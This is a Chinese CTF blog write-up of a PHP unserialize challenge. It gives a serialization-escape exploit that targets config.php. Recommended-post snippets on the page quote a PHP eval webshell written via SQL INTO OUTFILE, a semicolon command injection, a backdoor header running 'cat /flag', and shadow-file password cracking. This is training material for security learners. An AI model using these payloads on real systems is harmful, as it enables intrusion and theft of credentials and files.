[青少年CTF]Web_unserialize

最新推荐文章于 2024-07-12 15:51:39 发布
最新推荐文章于 2024-07-12 15:51:39 发布
阅读量291 收藏 1
点赞数
分类专栏: CTF解题 #青少年CTF 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_50553973/article/details/129579902
版权

这道题一开始需要扫目录发现www.zip,下载下来开源码分析,最后写出exp:

<?php

class b

{

    public $phone = "12345678901";

    public $email = "163@163.com";

    public $nickname = array("wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere");

    public $photo = "config.php";

}

$a=new b();

$profile = serialize($a);

echo $profile;

?>

发包后在点击查看

将此base64解密得出flag

明裕学长
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
青少年CTF-Web-Easy PingMe攻略
小苏
11-30 886
分号字符,决定使用这个符号进行操作,经过这条命令可以得知本目录下还有一个文件名为【flag.php】,猜测flag就在该文件中,所以使用【1.1.1.1;这是因为他是php语言,且将flag赋值在了变量中,并没有将它进行输出!第二步:开始尝试注入,先测试是否会过滤一些字符之类的操作 这里以【1.1.1.1;见怪不怪了,尝试【CTRL+U】查看源代码看看是否有什么东西出现!end:遇到命令注入的可以尝试【;前言:根据题目意思得知该题目为命令执行【命令注入】第一步:启动靶场,然后打开链接查看原型。
ctf_web_kmipn
05-06
用户用户密码 Sandiuser Sandiuser
CTFWeb各种题目的解题姿势
05-25
Web题型是CTF中常考题型之一,它将实际渗透过程中的技术技巧转化为CTF赛题,主要考察选手在Web渗透技术方面的能力,由于Web渗透涉及的知识点较多,知识面比较广泛,因此系统的总结和练习Web类题,是快速掌握出题人思路的一种有效的方法。
[青少年CTF] easy_web 详解+避坑
明裕学长的博客
03-13 4498
这里坑就来了我们需要使用hackbar先进行一次post传递搭配burp抓包。希望小伙伴们可以一步一步的复现而不是直接填flag那样是没有效果滴!注意这里的回显结果不能出现md5 is funny ~发现它经过了两次base64编码和一次十六进制编码。我们反向操作一波查看index.php的源码。这里可以将img=删除因为我们已经绕过了。这里的%20是url编码是空格。下面在搭配../进行目录遍历。接着我们将post参数替换成。这让我联想到地址栏中的参数。下面我们进行了l\s绕过。解开后发现是图片源码。
[攻防世界XCTF&青少年CTF]做题笔记upload1|warmup|Web_phpunserialize|CheckMe08|Queen|Web_python_template_injection
明裕学长的博客
03-18 518
举个例子,传入参数是flag.php,首先经过mb_strpos获取位数,为8.然后经过mb_substr截取flag.php的前八位,也就是flag.php。mb_substr() 函数返回字符串的一部分。substr() 函数,它只针对英文字符,如果要分割的中文文字则需要使用mb_substr()。函数过滤,就执行文件包含,否则就输出滑稽图片,而需要被包含的文件就是。返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。这段代码的大意是获取传入的参数位数,然后截取前该位数的字符。
反序列化漏洞(例题 web unserialize3)(保姆级新手教程)(有些地方讲的不好不对,请批评指正)
qq_74035288的博客
04-25 93
我们不能直接反改序列化字符得到flag,因为看网站源码有--wakeup(),我们搜索,知道了,**__wakeup()**是PHP的一个魔法函数(一般魔法函数都以两条下划线开头),在进行unserialize。根据本题我们得到的序列化字符串,看到标准的格式:O:<类名的长度>:“<类名>”:<成员属性的个数>:{S:…类成员属性的个数的判断:class里定义了几个变量,就有几个类成员属性,所以我们由①式看到本题属性个数为1,我们改成2,或3或以上,就可以执行漏洞了。s:3:"111";
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
CTF_Web_docker:CTF_Web的码头工人
05-14
CTF_Web_dockerCTFWeb和Bin最大的区别在于,一旦比赛结束,Web选手就抓瞎了,没办法复现EXP。因此,打算收集整理一些自己做的Web题环境,方便复现。Enjoy it.
CTF神器_ctf
09-23
在这个压缩包“CTF神器_ctf”中,重点可能指向了一个名为“dirsearch”的工具,这是一款强大的文件路径枚举和Web目录扫描工具,对于CTF比赛中的Web挑战尤为有用。 【描述】:“对网站文件管理,对网站后台文件进行...
轩禹CTF_RSA工具3.6.1.zip
01-29
CTF常用工具集
CTF Web_php_unserialize 详细解题过程
m0_63028223的博客
04-16 3262
打开靶场地址,我们看到是一个php代码 我们首先利用kali虚拟机内的dirb,获取敏感信息,扫描网站敏感文件 扫描可以得出该网站下的文件,我将它复制在记事本中 发现一个数据库网站 获取到账号为root密码为空 登录数据库,在SQL出编写一句话木马,并执行。 SELECT "<?php eval(@$_POST['pass']); ?>" INTO OUTFILE '/tmp/test1.php' 接下来我们使用中国蚁剑,链接我们所编写的木马, SELECT "&
青少年CTF训练平台-WEB-部分wp
SwBack的博客
04-04 2336
扫描发现备份文件 打开发现flag直接上传,然后获取flag木马地址,通过扫描目录发现。直接添加请求头user-agentt: zerodiumsystem(‘cat /flag’);连接之后,查找具有权限的命令根据提示直接发现flag 提示说明没有中文但是仍然错误,查看shadow,通过john破解密码 用户名后有$y,则表明密码已使用 yescrypt 进行哈希处理指定format参数 新手的登录 使用提示的user账号登录之后抓包修改cookie为admin。发包,得到flag访问之后直接查看js
WP|2022第六届强网杯青少赛线上赛WriteUp 中学生CTF 青少年CTF
zxsctf的博客
09-22 5155
这次比赛,非常感谢来自许昌学院的ZIKH26师傅的Pwn、和粥续师傅的Misc,我这次出的题目不多,并且个人排名也不是很靠前。 赛前我们也做了很多次学习、夜以继日的刷题,辛辛苦苦的把这次比赛的线上赛打出了一个还不错的成绩。 非常感谢能够有二位师傅的拼力以赴,才有如今的成绩。 部分题目已经复现放到“青少年CTF平台”中,感兴趣的可以前去作答,不知道平台地址的可以看我们本次文章的副条或百度搜索“青少年CTF”。
0ctf_2016 _Web_unserialize
snowlyzz的博客
09-13 362
代码审计+反序列化
CTF-web_php_serialize反序列化
Be Smart
02-24 843
一.根据题目猜测和反序列化漏洞有关 1.思路: 进入实验环境后,发现是一段php代码,通过接受get请求方式将提交过来的var的值, 先进行base64解码,再进行正则的判断,如果不匹配成功就会反序列化输入的参数值。 所以这里我们目的就是为了绕过正则表达式,让其反序列化出我们要的fl4g.php,再通过析构函数,高亮出fl4g文件中的内容。 2.步骤: 通过代码中的注释我们发现flag在fl4g.php这个文件里面,所以我们要将其序列化 编写一段代码先实例化我们要序列化的类,这里吧fl4g.php传进去,
PHP编程开发工具有哪些?
Pythonit教程网
07-10 999
PHP开发工具种类繁多,涵盖了从集成开发环境(IDE)、代码编辑器、调试器到版本控制工具和数据库管理工具等多个方面。以下是一些常见的PHP开发工具:### 1. 集成开发环境(IDE)* **PhpStorm**:由JetBrains开发的全功能PHP IDE,提供了代码自动完成、调试器、版本控制工具等丰富的功能,支持多种框架和技术。PhpStorm拥有最现代化的功能集,可以快速便捷地进行网页开发,并支持所有PHP语言功能,是专业PHP开发的优选工具。 * **Eclipse PDT**:基于Eclips
【Docker-compose】搭建php 环境
AllenIverrui的博客
07-10 965
ElasticSearch是一款非常强大的、基于Lucene的开源搜索及分析引擎;它是一个实时的分布式搜索分析引擎,它能让你以前所未有的速度和规模,去探索你的数据。它被用作全文检索结构化搜索分析以及这三个功能的组合:Wikipedia使用 Elasticsearch 提供带有高亮片段的全文搜索,还有 search-as-you-type 和 did-you-mean 的建议。卫报使用 Elasticsearch 将网络社交数据结合到访客日志中,为它的编辑们提供公众对于新文章的实时反馈。
PHP7.4安装使用rabbitMQ教程(windows)
qq_28546559的博客
07-09 223
1,可能报错ext-sockets * -> it is missing,在php.ini中开启sockets扩展既可。下载地址:https://pecl.php.net/package/amqp。3,修改php.ini文件,增加extension=php_amqp.dll。1,将php_amqp.dll放到对应的php的ext目录下。三,安装库——php-amqplib/php-amqplib。一,检查php版本phpinfo()——下载所需扩展。
java版的上门家政系统和PHP版的上门家政有什么区别?
最新发布
baina666的博客
07-12 385
综上所述,Java版和PHP版的上门家政系统各有优缺点,选择哪种语言主要取决于项目的具体需求、预算、开发团队的技术栈以及未来的扩展计划等因素。同时,由于Java生态系统的复杂性和多样性,也可能需要投入更多的时间和资源来学习和掌握相关的技术和工具。Java版:Java拥有庞大的生态系统和丰富的第三方库,这为家政系统的开发和扩展提供了强大的支持。Java版:由于Java的编译执行机制和高效的垃圾回收算法,Java版家政系统通常具有更高的运行效率和更好的性能表现,尤其是在处理高并发、大数据量等复杂场景时。
青少年ctf web unserialize
08-28
青少年 CTF(Capture The Flag)比赛是一个针对青少年的网络安全竞赛。在 CTF 中的 Web 题目中,可能会涉及到反序列化(unserialize)漏洞。 反序列化漏洞是一种常见的安全问题,它发生在将数据从序列化的状态...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

明裕学长

打赏私我进交流群

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值